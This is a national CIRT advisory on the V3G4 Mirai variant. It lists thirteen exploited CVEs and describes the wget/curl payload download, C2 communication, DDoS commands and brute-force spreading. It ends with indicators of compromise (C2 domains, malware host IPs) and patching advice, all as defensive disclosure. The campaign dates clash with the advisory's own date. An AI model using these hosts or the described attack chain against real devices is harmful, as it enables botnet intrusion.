New Mirai variant targets Linux devices (February 21, 2023)

Ref# AL2023_18 | Date: Feb 21st 2023

Description  

A new Mirai malware variant tracked as V3G4 was seen exploiting over ten vulnerabilities to breach Linux devices and establish them as a DDoS botnet. 

Details 

Researchers from Unit 42 have observed the new Mirai variant activities in three campaigns between July to December 2023. The campaigns were believed to be operated by the same unknown treat actor because: 

  • The same hardcoded command and control (C2) domain were seen used in all three campaigns. 

  • The malware shell script downloaders are very similar for all three campaigns. 

  • The botnet samples use the same XOR decryption key. 

  • The botnet samples use the same process termination list. 

  • The botnet samples use very similar functions. 

V3G4 gains initial access to Linux devices by exploiting 13 vulnerabilities which grants treat actors remote code execution (RCE). The vulnerabilities exploited include the following:  

  1. CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability 

  1. Gitorious Remote Command Execution Vulnerability 

  1. CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability 

  1. Mitel AWC Remote Command Execution Vulnerability 

  1. CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability 

  1. CVE-2019-15107: Webmin Command Injection Vulnerability 

  1. Spree Commerce Arbitrary Command Execution Vulnerability 

  1. FLIR Thermal Camera Remote Command Execution Vulnerability 

  1. CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability 

  1. CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability 

  1. CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability 

  1. CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability 

  1. CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability 

Once a device has been compromised, the wget and curl utilities are initiated to download the Mirai malware sample and execute it. The malware contains a list of process names where it runs a check on the compromised system and terminates any process matching its list. Some of the process name listed belongs to other botnet malware families and even other mirai variants. The malware then attempts to connect to its hardcoded C2 server (abc.8×19.com). The malware receives commands for botnet execution directly from its C2 server, in the form of encrypted strings. These botnet command strings are decrypted with four rounds of XOR decryption keys, and the commands include TCP, UDP, SYN and HTTP DDoS flooding methods.  

V3G4 can also infect other devices on a network using its telnet/SSH scanner function. The malware scans for these protocols and attempts to spread itself by brute forcing weak username/password combinations. 

Indicators of Compromise 

The following are a list of IOCs related to the V3G4 malware: 

  1. C2 server: abc.8×19.com, comeanalyze.8×19.com 

  1. Malware Host: 176.123.9.238, 198.98.49.79, 104.244.72.64 

Remediation 

Since this malware relies on exploiting the 13 vulnerabilities mentioned above, it is highly recommended to apply patches and updates to Linux devices to address these issues as soon as possible. 

The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.     

PDF Download: New Mirai variant targets Linux devices.pdf

References